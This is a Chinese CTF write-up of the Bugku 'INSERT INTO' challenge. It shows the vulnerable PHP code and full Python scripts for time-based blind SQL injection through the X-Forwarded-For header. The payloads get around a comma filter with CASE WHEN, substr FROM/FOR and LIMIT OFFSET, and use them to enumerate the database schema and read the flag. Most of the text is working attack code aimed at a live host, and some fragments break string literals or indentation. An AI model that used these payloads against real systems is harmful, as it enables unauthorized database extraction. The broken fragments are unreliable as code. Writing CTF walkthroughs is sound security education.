

bugku—INSERT INTO注入解答

原创

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订阅专栏

本来不打算单独的ctf题目成文, 但是这个题写payload快看花我的眼睛了, 不写一篇记录一下代码对不住我的眼睛。

题目主页: <https://ctf.bugku.com/challenges>

```
error_reporting(0);

function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
```

题目中给出了源码, 简单分析可以看出脚本读取http头部x-forwarded-for作为ip地址, 在将其传给\$ip之前, 以,为分割符进行分割并取结果数组的第一项。

要进行注入的sql语句为:

```
insert into client_ip (ip) values ('$ip')
```

很明显, 这是一道过滤了逗号的xff注入题目。由于返回结果无有效回显, 可以进行时间盲注。

我看到网络上有些writeup在猜解flag时直接得知了它在flag表的flag列，也许是一种巧妙的猜测？老子是猜不到，只能通过information_schema数据库慢慢猜解表和列了。

一些知识点：

1. 元数据在sql注入中的应用，即informations_schema库中的SCHEMATA、TABLES、COLUMNS表中存储着数据库系统中数据库、表、列的信息。
2. MySQL中的case when语句。进行时间盲注时自然想到的是if(cond,expr1,expr2)语句，但是此处对逗号进行了过滤，因此采用case when 代替if进行时间盲注。
3. substr截取字符串的非逗号形式。进行时间盲注要穷举字符，需要通过substr截取字符串，但是常用的形式substr([str],[from],[len])含有逗号，因此采用substr([str] from [from] for [len])来代替，比如substr('asd',1,2)与substr('asd' from 1 for 2)都获得'as'。
4. limit的非逗号形式。有时一条语句可以查询出多个结果，进行一一猜解时要每次限制查询出一条结果，在不使用逗号时，用limit [len] offset [offset] 代替 limit [offset],[len]。

下面是猜解代码，可以通过改写为多线程/进程提高网络io速度，可以通过提高sleep及timeout时间提高准确度。

猜解库及表：

```
import requests

dic='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-'
#猜解数据库名称的payload
payload_db = "1'+(select case when (substr(database() from {0} for 1)='{1}') then sleep(6) else 1 end)+'1"
#猜解表数量的payload
payload_tb_num = "1'+(select case when (select count(*) from information_schema.TABLES where TABLE_SCHEMA='{0}')
='{1}' then sleep(6) else 1 end)+'1"
#猜解表名字长度的payload，注：其实也可不猜解长度，直接猜解具体字符，当发现名称字符串不变时(即不再捕获到ReadTimeout异常添加字符时)说明猜解完成
payload_tb_name_len = "1'+(select case when (select length(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) = '{2}' then sleep(6) else 1 end)+'1"
#猜解表名字的payload
payload_tb_name = "1'+(select case when (substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) from {2} for 1)) = '{3}' then sleep(6) else 1 end)+'1"
url = 'http://123.206.87.240:8002/web15/'

db_name = ''
#数据库名破解
for i in range(1,6):
    for j in dic:
        try:
            headers = {'x-forwarded-for':payload_db.format(i,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            print(payload_db.format(i,j))
            db_name += j
            break
print('db_name: ' + db_name) #运行后可知数据库名为web15
#表数量破解
tb_num = 0
for i in range(1,50):
    try:
        headers = {'x-forwarded-for':payload_tb_num.format(db_name,str(i))}
        res = requests.get(url,headers=headers,timeout=5)
    except requests.exceptions.ReadTimeout:
        tb_num = i
    print('tb_num: {}'.format(i))
```

```

print('tb_num: ' + str(i))
break
#运行后可知有两个表
#表名破解
len = 0
for i in range(tb_num):
    #crack length first
    for j in range(50):
        try:
            headers = {'x-forwarded-for':payload_tb_name_len.format(db_name,i,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            len = j
            break
    print('No.'+str(i+1)+' table has length: ' + str(len))
    #crack name
    tb_name = ''
    for k in range(1,len + 1):
        for j in dic:
            try:
                headers = {'x-forwarded-for':payload_tb_name.format(db_name,i,k,j)}
                res = requests.get(url,headers=headers,timeout=5)
            except requests.exceptions.ReadTimeout:
                print(payload_tb_name.format(db_name,i,k,j))
                tb_name += j
                break
    print(tb_name)
#运行后可知两个表为flag和client_ip

```

猜解列:

```

import requests

dic='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_'

#crack column number 运行后可知仅有1列
target_db = 'web15'
target_tb = 'flag'
col_num = 0
payload_col_num = "1'+(select case when (select count(*) from information_schema.COLUMNS where TABLE_SCHEMA='{0}' and TABLE_NAME='{1}') = '{2}' then sleep(6) else 1 end)+'1"
payload_col_len = "1'+(select case when (select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA='{0}' and TABLE_NAME='{1}' limit 1 offset {2}) = '{3}' then sleep(6) else 1 end)+'1"
payload_col_name = "1'+(select case when (substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='{0}' and TABLE_NAME='{1}' limit 1 offset {2}) from {3} for 1)) = '{4}' then sleep(6) else 1 end)+'1"
for i in range(50):
    try:
        headers = {'x-forwarded-for':payload_col_num.format(target_db,target_tb,i)}
        res = requests.get(url,headers=headers,timeout=5)
    except requests.exceptions.ReadTimeout:
        col_num = i
        print('col_num=' + str(col_num))
        break

#crack column name
len = 0
for i in range (col_num):
    #crack column length 运行后可知长度为4
    for j in range(50):
        try:
            headers = {'x-forwarded-for':payload_col_len.format(target_db,target_tb,i,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            len = j
            print('No.' + str(i+1) + ' length : ' + str(len))
            break

#crack name 运行后可知列名字为flag
col_name = ''
for k in range(1,len + 1):
    for j in dic:
        try:
            headers = {'x-forwarded-for':payload_col_name.format(target_db,target_tb,i,k,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            col_name += j
            print(col_name)
            break

```

猜解flag:

```
import requests

dic='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_'

#get content 猜解flag
flag = ''
payload_content = "1'+(select case when (substr((select flag from flag) from {0} for 1)) = '{1}' then sleep(6) e
lse 1 end)+'1"
for i in range(1,100):
    for j in dic:
        try:
            headers = {'x-forwarded-for':payload_content.format(i,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            print(payload_content.format(i,j))
            flag += j
            break
    print(flag)
```